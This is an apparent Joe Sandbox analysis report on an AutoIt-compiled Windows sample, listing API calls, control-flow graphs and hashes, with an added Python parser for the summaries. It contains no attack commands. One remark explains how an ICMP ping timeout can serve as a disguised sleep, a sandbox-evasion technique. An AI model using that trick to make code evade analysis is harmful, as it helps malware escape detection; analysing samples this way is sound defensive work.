• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
• String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                                                                                          • API String ID: 98802146-2727554177
                                                                                                                                                                                          • Opcode ID: c72acf9a930c98513379b833a3263dc61eab4e9bc792ef17df1fe0a6aa42f6de
                                                                                                                                                                                          • Instruction ID: eb8940c1910c43a3d37dad192a108423d1ded78ce35d870ad1423c24e1ad02c2
                                                                                                                                                                                          • Opcode Fuzzy Hash: c72acf9a930c98513379b833a3263dc61eab4e9bc792ef17df1fe0a6aa42f6de
                                                                                                                                                                                          • Instruction Fuzzy Hash: C171CF71104301EED714EF69EC8599BBBECFF98340F40442EF545872A1EB799A48CBA2
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

Control-flow Graph

APIs
• GetSysColorBrush.USER32(0000000F), ref: 007334DE
• LoadCursorW.USER32(00000000,00007F00), ref: 007334ED
• LoadIconW.USER32(00000063), ref: 00733503
• LoadIconW.USER32(000000A4), ref: 00733515
• LoadIconW.USER32(000000A2), ref: 00733527
• LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 0073353F
• RegisterClassExW.USER32(?), ref: 00733590
  • Part of subcall function 00733624: GetSysColorBrush.USER32(0000000F), ref: 00733657
  • Part of subcall function 00733624: RegisterClassExW.USER32(00000030), ref: 00733681
  • Part of subcall function 00733624: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00733692
  • Part of subcall function 00733624: InitCommonControlsEx.COMCTL32(?), ref: 007336AF
  • Part of subcall function 00733624: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007336BF
  • Part of subcall function 00733624: LoadIconW.USER32(000000A9), ref: 007336D5
  • Part of subcall function 00733624: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 007336E4
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
• String ID: #$0$AutoIt v3
• API String ID: 423443420-4155596026
• Opcode ID: 3ad4ae510091b04ed3c24587981dcd715fdd65ffcfb52a99750712c998919c03
• Instruction ID: 227278846a9d31b8ef3ebad7b30a232c53b08632164ec580da88e925b971a5c4
• Opcode Fuzzy Hash: 3ad4ae510091b04ed3c24587981dcd715fdd65ffcfb52a99750712c998919c03
• Instruction Fuzzy Hash: A9211A70D00318ABDB609FA9EC59AA9BFB4FB08B50F01402AE604A63B0D7F949458F94
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph 534 7b0fb8-7b0fef call 73e6a0 537 7b100f-7b1021 WSAStartup 534->537 538 7b0ff1-7b0ffe call 73c98d 534->538 539 7b1023-7b1031 537->539 540 7b1054-7b1091 call 74c1f6 call 738ec0 call 74f9d4 inet_addr gethostbyname 537->540 538->537 549 7b1000-7b100b call 73c98d 538->549 542 7b1033 539->542 543 7b1036-7b1046 539->543 557 7b1093-7b10a0 IcmpCreateFile 540->557 558 7b10a2-7b10b0 540->558 542->543 546 7b104b-7b104f 543->546 547 7b1048 543->547 550 7b1249-7b1251 546->550 547->546 549->537 557->558 559 7b10d3-7b1100 call 75017b call 73423c 557->559 560 7b10b2 558->560 561 7b10b5-7b10c5 558->561 570 7b112b-7b1148 IcmpSendEcho 559->570 571 7b1102-7b1129 IcmpSendEcho 559->571 560->561 562 7b10ca-7b10ce 561->562 563 7b10c7 561->563 565 7b1240-7b1244 call 73bd98 562->565 563->562 565->550 572 7b114c-7b114e 570->572 571->572 573 7b11ae-7b11bc 572->573 574 7b1150-7b1155 572->574 575 7b11be 573->575 576 7b11c1-7b11c8 573->576 577 7b115b-7b1160 574->577 578 7b11f8-7b120a call 73e6a0 574->578 575->576 580 7b11e4-7b11ed 576->580 581 7b11ca-7b11d8 577->581 582 7b1162-7b1167 577->582 589 7b120c-7b120e 578->589 590 7b1210 578->590 586 7b11ef 580->586 587 7b11f2-7b11f6 580->587 584 7b11da 581->584 585 7b11dd 581->585 582->573 588 7b1169-7b116e 582->588 584->585 585->580 586->587 591 7b1212-7b1229 IcmpCloseHandle WSACleanup 587->591 592 7b1193-7b11a1 588->592 593 7b1170-7b1175 588->593 589->591 590->591 591->565 597 7b122b-7b123d call 75013d call 750184 591->597 595 7b11a3 592->595 596 7b11a6-7b11ac 592->596 593->581 594 7b1177-7b1185 593->594 598 7b118a-7b1191 594->598 599 7b1187 594->599 595->596 596->580 597->565 598->580 599->598
APIs
• WSAStartup.WSOCK32(00000101,?), ref: 007B1019
• inet_addr.WSOCK32(?), ref: 007B1079
• gethostbyname.WS2_32(?), ref: 007B1085
• IcmpCreateFile.IPHLPAPI ref: 007B1093
• IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 007B1123
• IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 007B1142
• IcmpCloseHandle.IPHLPAPI(?), ref: 007B1216
• WSACleanup.WSOCK32 ref: 007B121C
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
• String ID: Ping
• API String ID: 1028309954-2246546115
• Opcode ID: a3a4a3a52172ae8f90f35eae1498d3612728f46b7c46d5edf58b1a196263acb1
• Instruction ID: 1be08fa0b2e20d1076285697e2593fcc2a25a1090fe18c1e5bb5dd99b43f247c
• Opcode Fuzzy Hash: a3a4a3a52172ae8f90f35eae1498d3612728f46b7c46d5edf58b1a196263acb1
• Instruction Fuzzy Hash: D891DF31604205DFD720DF19C898F96BBE0FF44318F9585A9F5698B6A2C738ED45CB81
Uniqueness

Uniqueness Score: -1.00%
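The function summaries in this report are dense but regular: an "APIs" list whose entries read `Name.MODULE(args), ref: address` (subcall entries prefixed with "Part of subcall function"), followed by "Similarity" key/value lines. Parsing them lets you query a function's API set and argument values mechanically, for example to pull the timeout passed to IcmpSendEcho (its eighth parameter, in milliseconds; 00000FA0 above is 4000 ms, which matches the default timeout of AutoIt's Ping() function, consistent with the "AutoIt v3" strings found elsewhere in this module). The parser below is an added example, not part of the Joe Sandbox report or of Joe Sandbox itself; SAMPLE is a constructed excerpt copied from two of the function summaries on this page, and the `classify` labels are this example's own heuristics, not Joe Sandbox signatures.

```python
"""Parse Joe Sandbox per-function "APIs" / "Similarity" summaries into records.
Added example (not part of the report or of Joe Sandbox).  SAMPLE is a
constructed excerpt copied from two function summaries in this report."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

IMAGE_BASE = 0x730000  # "Offset: 00730000" in the report's Memory Dump Source block

SAMPLE = """\
APIs
• WSAStartup.WSOCK32(00000101,?), ref: 007B1019
• inet_addr.WSOCK32(?), ref: 007B1079
• gethostbyname.WS2_32(?), ref: 007B1085
• IcmpCreateFile.IPHLPAPI ref: 007B1093
• IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 007B1123
• IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 007B1142
• IcmpCloseHandle.IPHLPAPI(?), ref: 007B1216
• WSACleanup.WSOCK32 ref: 007B121C
Similarity
• API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
• String ID: Ping
• Instruction Fuzzy Hash: D891DF31604205DFD720DF19C898F96BBE0FF44318F9585A9F5698B6A2C738ED45CB81
APIs
• GetSysColorBrush.USER32(0000000F), ref: 007334DE
• LoadCursorW.USER32(00000000,00007F00), ref: 007334ED
• RegisterClassExW.USER32(?), ref: 00733590
  • Part of subcall function 00733624: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00733692
  • Part of subcall function 00733624: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007336BF
Similarity
• API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
• String ID: #$0$AutoIt v3
"""

# One API line: optional subcall prefix, Name.MODULE, optional (args), ", ref: addr".
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
# One "Similarity" key/value line.
META_RE = re.compile(
    r"^\s*•\s*(?P<key>API String ID|API ID|String ID|Opcode ID|Instruction ID|"
    r"Opcode Fuzzy Hash|Instruction Fuzzy Hash):\s*(?P<val>.*?)\s*$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: int                          # call-site address as printed (image is mapped at IMAGE_BASE)
    subcall_of: Optional[int] = None  # set when the line is "Part of subcall function X"


@dataclass
class FunctionSummary:
    calls: List[ApiCall] = field(default_factory=list)
    meta: Dict[str, str] = field(default_factory=dict)


def parse_summaries(text: str) -> List[FunctionSummary]:
    """Split report text at each "APIs" header and collect that function's calls and metadata."""
    summaries: List[FunctionSummary] = []
    cur: Optional[FunctionSummary] = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = FunctionSummary()
            summaries.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            cur.calls.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16),
                                     int(m["sub"], 16) if m["sub"] else None))
            continue
        m = META_RE.match(line)
        if m:
            cur.meta[m["key"]] = m["val"]
    return summaries


def hexarg(s: str) -> Optional[int]:
    """Decode an 8-hex-digit argument; '?' (value not recovered by the sandbox) gives None."""
    return int(s, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", s) else None


def rva(ref: int) -> int:
    """Relative virtual address of a call site, using the dump's load address."""
    return ref - IMAGE_BASE


def int_args(summary: FunctionSummary, api_name: str, index: int) -> List[int]:
    """Numeric values of argument `index` across every call to `api_name` in the summary."""
    vals = []
    for c in summary.calls:
        if c.name == api_name and index < len(c.args):
            v = hexarg(c.args[index])
            if v is not None:
                vals.append(v)
    return vals


def classify(summary: FunctionSummary) -> str:
    """Heuristic label from the function's direct API set (this example's assumption)."""
    names = {c.name for c in summary.calls if c.subcall_of is None}
    if {"IcmpSendEcho", "WSAStartup"} <= names:
        return "icmp-ping"
    if "RegisterClassExW" in names:
        return "window-class-registration"
    return "other"


if __name__ == "__main__":
    for s in parse_summaries(SAMPLE):
        print(classify(s), s.meta.get("String ID"),
              "IcmpSendEcho timeouts (ms):", int_args(s, "IcmpSendEcho", 7))
```

Argument index 7 is IcmpSendEcho's Timeout parameter and index 3 its RequestSize; both calls in the Ping routine above send 5 data bytes with a 4000 ms timeout, and a call made while the sandbox has no network answer blocks for up to that timeout, which is why such a routine can double as a sleep.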

Control-flow Graph

control_flow_graph 604 73370f-733724 605 733726-733729 604->605 606 733784-733786 604->606 607 73372b-733732 605->607 608 73378a 605->608 606->605 609 733788 606->609 610 733804-73380c PostQuitMessage 607->610 611 733738-73373d 607->611 613 773df4-773e1c call 732f92 call 74f23c 608->613 614 733790-733795 608->614 612 73376f-733777 DefWindowProcW 609->612 619 7337b8-7337ba 610->619 615 733743-733747 611->615 616 773e61-773e75 call 79c8f7 611->616 618 73377d-733783 612->618 650 773e21-773e28 613->650 620 733797-73379a 614->620 621 7337bc-7337e3 SetTimer RegisterWindowMessageW 614->621 624 73380e-733818 call 74fcad 615->624 625 73374d-733752 615->625 616->619 643 773e7b 616->643 619->618 622 773d95-773d98 620->622 623 7337a0-7337b3 KillTimer call 733907 call 7359ff 620->623 621->619 626 7337e5-7337f0 CreatePopupMenu 621->626 635 773dd0-773def MoveWindow 622->635 636 773d9a-773d9e 622->636 623->619 645 73381d 624->645 630 773e46-773e4d 625->630 631 733758-73375d 625->631 626->619 640 773e53-773e5c call 791423 630->640 641 733763-733769 631->641 642 7337f2-733802 call 73381f 631->642 635->619 637 773da0-773da3 636->637 638 773dbf-773dcb SetFocus 636->638 637->641 646 773da9-773dba call 732f92 637->646 638->619 640->612 641->612 641->650 642->619 643->612 645->619 646->619 650->612 654 773e2e-773e41 call 733907 call 73396b 650->654 654->612
APIs
• DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00733709,?,?), ref: 00733777
• KillTimer.USER32(?,00000001,?,?,?,?,?,00733709,?,?), ref: 007337A3
• SetTimer.USER32(?,00000001,000002EE,00000000), ref: 007337C6
• RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00733709,?,?), ref: 007337D1
• CreatePopupMenu.USER32 ref: 007337E5
• PostQuitMessage.USER32(00000000), ref: 00733806
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
• String ID: TaskbarCreated
• API String ID: 129472671-2362178303
• Opcode ID: 3d3a04394607f73d8660e3f401e918c11da35a970253353c15e484199eb542da
• Instruction ID: 832367a66a653c33e3cd811e6e29bf2a3e77f25a8c102248f743cddbe26b4ace
• Opcode Fuzzy Hash: 3d3a04394607f73d8660e3f401e918c11da35a970253353c15e484199eb542da
• Instruction Fuzzy Hash: 3241B3F1200245FBFB342B789C9DFB93B69FB14301F148229F505892A2DABC9F459761
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph 660 732ab0-732ae9 661 732aef-732b05 mciSendStringW 660->661 662 773a1a-773a1b DestroyWindow 660->662 663 732d66-732d73 661->663 664 732b0b-732b13 661->664 665 773a26-773a33 662->665 667 732d75-732d90 UnregisterHotKey 663->667 668 732d98-732d9f 663->668 664->665 666 732b19-732b28 call 732ede 664->666 670 773a35-773a38 665->670 671 773a62-773a69 665->671 681 773a70-773a7c 666->681 682 732b2e-732b36 666->682 667->668 673 732d92-732d93 call 732770 667->673 668->664 669 732da5 668->669 669->663 676 773a44-773a47 FindClose 670->676 677 773a3a-773a42 call 737aab 670->677 671->665 675 773a6b 671->675 673->668 675->681 680 773a4d-773a5a 676->680 677->680 680->671 683 773a5c-773a5d call 7a3cf6 680->683 686 773a86-773a8d 681->686 687 773a7e-773a80 FreeLibrary 681->687 684 773a94-773aa1 682->684 685 732b3c-732b61 call 73e6a0 682->685 683->671 692 773aa3-773ac0 VirtualFree 684->692 693 773ac8-773acf 684->693 697 732b63 685->697 698 732b98-732ba3 OleUninitialize 685->698 686->681 691 773a8f 686->691 687->686 691->684 692->693 695 773ac2-773ac3 call 7a3d5c 692->695 693->684 696 773ad1 693->696 695->693 700 773ad6-773ada 696->700 701 732b66-732b96 call 7330c0 call 733069 697->701 698->700 702 732ba9-732bae 698->702 700->702 703 773ae0-773ae6 700->703 701->698 705 732bb4-732bbe 702->705 706 773aeb-773af8 call 7a3d30 702->706 703->702 709 732da7-732db4 call 74fb19 705->709 710 732bc4-732c45 call 73bd98 call 732ff4 call 732e85 call 750184 call 732e1c call 73bd98 call 73e6a0 call 732eae call 750184 705->710 718 773afa 706->718 709->710 720 732dba 709->720 723 773aff-773b21 call 75013d 710->723 750 732c4b-732c6f call 750184 710->750 718->723 720->709 729 773b23 723->729 732 773b28-773b4a call 75013d 729->732 737 773b4c 732->737 740 773b51-773b73 call 75013d 737->740 746 773b75 740->746 749 773b7a-773b87 call 796e3b 746->749 756 773b89 749->756 750->732 755 732c75-732c99 call 750184 750->755 755->740 760 732c9f-732cb9 call 750184 755->760 759 773b8e-773b9b call 74bdf0 756->759 764 773b9d 759->764 760->749 766 732cbf-732ce3 call 732e85 call 750184 760->766 767 773ba2-773baf call 7a3c8a 764->767 766->759 775 732ce9-732cf1 766->775 773 773bb1 767->773 776 773bb6-773bc3 call 7a3d11 773->776 775->767 777 732cf7-732d15 call 73bd98 call 732fba 775->777 783 773bc5 776->783 777->776 785 732d1b-732d29 777->785 786 773bca-773bd7 call 7a3d11 783->786 785->786 787 732d2f-732d65 call 73bd98 * 3 call 732f26 785->787 791 773bd9 786->791 791->791
APIs
• mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00732AF9
• OleUninitialize.OLE32(?,00000000), ref: 00732B98
• UnregisterHotKey.USER32(?), ref: 00732D7D
• DestroyWindow.USER32(?), ref: 00773A1B
• FreeLibrary.KERNEL32(?), ref: 00773A80
• VirtualFree.KERNEL32(?,00000000,00008000), ref: 00773AAD
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
• String ID: close all
• API String ID: 469580280-3243417748
• Opcode ID: 2e9873fa5fedf662c3f0df562a82fd58eaf165b144e63aea5b79a9f11be143bf
• Instruction ID: 229c0cd8448658d1214aff44cd7c070bf040b5004367402960d62dde27b9fb69
• Opcode Fuzzy Hash: 2e9873fa5fedf662c3f0df562a82fd58eaf165b144e63aea5b79a9f11be143bf
• Instruction Fuzzy Hash: C9D15C71701212DFDB29EF14C849A69F7A0BF04750F1182ADE94A6B263DB38AD13DF84
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 799 7690c5-7690d5 800 7690d7-7690ea call 75f636 call 75f649 799->800 801 7690ef-7690f1 799->801 817 769471 800->817 803 7690f7-7690fd 801->803 804 769459-769466 call 75f636 call 75f649 801->804 803->804 807 769103-76912e 803->807 822 76946c call 762b5c 804->822 807->804 810 769134-76913d 807->810 813 769157-769159 810->813 814 76913f-769152 call 75f636 call 75f649 810->814 815 769455-769457 813->815 816 76915f-769163 813->816 814->822 821 769474-769479 815->821 816->815 820 769169-76916d 816->820 817->821 820->814 825 76916f-769186 820->825 822->817 828 7691a3-7691ac 825->828 829 769188-76918b 825->829 832 7691ae-7691c5 call 75f636 call 75f649 call 762b5c 828->832 833 7691ca-7691d4 828->833 830 769195-76919e 829->830 831 76918d-769193 829->831 836 76923f-769259 830->836 831->830 831->832 861 76938c 832->861 834 7691d6-7691d8 833->834 835 7691db-7691dc call 763b93 833->835 834->835 843 7691e1-7691f9 call 762d38 * 2 835->843 838 76925f-76926f 836->838 839 76932d-769336 call 76fc1b 836->839 838->839 842 769275-769277 838->842 852 769338-76934a 839->852 853 7693a9 839->853 842->839 846 76927d-7692a3 842->846 869 769216-76923c call 7697a4 843->869 870 7691fb-769211 call 75f649 call 75f636 843->870 846->839 850 7692a9-7692bc 846->850 850->839 857 7692be-7692c0 850->857 852->853 855 76934c-76935b GetConsoleMode 852->855 859 7693ad-7693c5 ReadFile 853->859 855->853 860 76935d-769361 855->860 857->839 862 7692c2-7692ed 857->862 864 7693c7-7693cd 859->864 865 769421-76942c GetLastError 859->865 860->859 866 769363-76937d ReadConsoleW 860->866 867 76938f-769399 call 762d38 861->867 862->839 868 7692ef-769302 862->868 864->865 873 7693cf 864->873 871 769445-769448 865->871 872 76942e-769440 call 75f649 call 75f636 865->872 876 76939e-7693a7 866->876 877 76937f GetLastError 866->877 867->821 868->839 881 769304-769306 868->881 869->836 870->861 878 769385-76938b call 75f613 871->878 879 76944e-769450 871->879 872->861 875 7693d2-7693e4 873->875 875->867 886 7693e6-7693ea 875->886 876->875 877->878 878->861 879->867 881->839 889 769308-769328 881->889 892 769403-76940e 886->892 893 7693ec-7693fc call 768de1 886->893 889->839 898 769410 call 768f31 892->898 899 76941a-76941f call 768c21 892->899 904 7693ff-769401 893->904 905 769415-769418 898->905 899->905 904->867 905->904
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 681c728ae1c646966b6030295be07f801f4f7deb7210cb989308a0658792edea
• Instruction ID: a1052d27dc71b6bdc4967c7933d4f443b5e9aaef2ac79d3f585470600ecfeee8
• Opcode Fuzzy Hash: 681c728ae1c646966b6030295be07f801f4f7deb7210cb989308a0658792edea
• Instruction Fuzzy Hash: 4DC1E370904249EFCF11DFA9D849BADBBB8BF0A310F144159EE16A7392C7789D42CB61
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 943 7335b3-733623 CreateWindowExW * 2 ShowWindow * 2
APIs
• CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 007335E1
• CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00733602
• ShowWindow.USER32(00000000,?,?,?,?,?,?,00733368,?), ref: 00733616
• ShowWindow.USER32(00000000,?,?,?,?,?,?,00733368,?), ref: 0073361F
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: Window$CreateShow
• String ID: AutoIt v3$edit
• API String ID: 1584632944-3779509399
• Opcode ID: 5174feda4c8e42bdfcbcdd28b79841f1d1afc77d47bb16960f5cd9693318b504
• Instruction ID: 29e3e36e7bcb00db65893ad3c105679ce2bc4ceebd8a16ccd9d93e6a7bb662f4
• Opcode Fuzzy Hash: 5174feda4c8e42bdfcbcdd28b79841f1d1afc77d47bb16960f5cd9693318b504
• Instruction Fuzzy Hash: 3DF0B7716403947AE77157176C0CE372FBDEBC6F50B02402EB904A6270D6A91C51DAB4
Uniqueness

Uniqueness Score: -1.00%

APIs
• QueryPerformanceCounter.KERNEL32(?), ref: 0079F2AE
• QueryPerformanceFrequency.KERNEL32(?), ref: 0079F2BC
• Sleep.KERNEL32(00000000), ref: 0079F2C4
• QueryPerformanceCounter.KERNEL32(?), ref: 0079F2CE
• Sleep.KERNEL32 ref: 0079F30A
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: PerformanceQuery$CounterSleep$Frequency
• String ID:
• API String ID: 2833360925-0
• Opcode ID: bae1413b862f08494fb202816fbc31e3edb956ce0c353be04aab1594e7a92c95
• Instruction ID: 147035284f570d62fee5b73f410a8437e9cbd1dfa4696f7b845a7532d95f17ba
• Opcode Fuzzy Hash: bae1413b862f08494fb202816fbc31e3edb956ce0c353be04aab1594e7a92c95
• Instruction Fuzzy Hash: B8016971D0161DEBCF10AFA4E849AEEBB78FB08710F06446AE901F2291DB3C9954C7A5
Uniqueness

Uniqueness Score: -1.00%

APIs
• LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00775287
  • Part of subcall function 00738577: _wcslen.LIBCMT ref: 0073858A
• Shell_NotifyIconW.SHELL32(00000001,?), ref: 00736299
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
                                                                                                                                                                                          • API ID: IconLoadNotifyShell_String_wcslen
                                                                                                                                                                                          • String ID: Line %d: $AutoIt -
                                                                                                                                                                                          • API String ID: 2289894680-4094128768
                                                                                                                                                                                          • Opcode ID: eb979199a954f108456e006a696e24a88187381ff85f20e5587d5166172c77a2
                                                                                                                                                                                          • Instruction ID: 582a7d23abeb0d02ba88cdc396d412f030783a57bc1dd07e63d2bfd3fbf5d83d
                                                                                                                                                                                          • Opcode Fuzzy Hash: eb979199a954f108456e006a696e24a88187381ff85f20e5587d5166172c77a2
                                                                                                                                                                                          • Instruction Fuzzy Hash: A541A5B1408304EAD764EB24DC49EDFB7E8BF45310F00852EF599921A2EF789649C796
Uniqueness

Uniqueness Score: -1.00%

APIs
• FindCloseChangeNotification.KERNEL32(00000000,00000000,?,OVw,0076894C,?,007F9CE8,0000000C,007689AB,?,OVw,?,0077564F), ref: 00768A84
• GetLastError.KERNEL32 ref: 00768A8E
• __dosmaperr.LIBCMT ref: 00768AB9
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
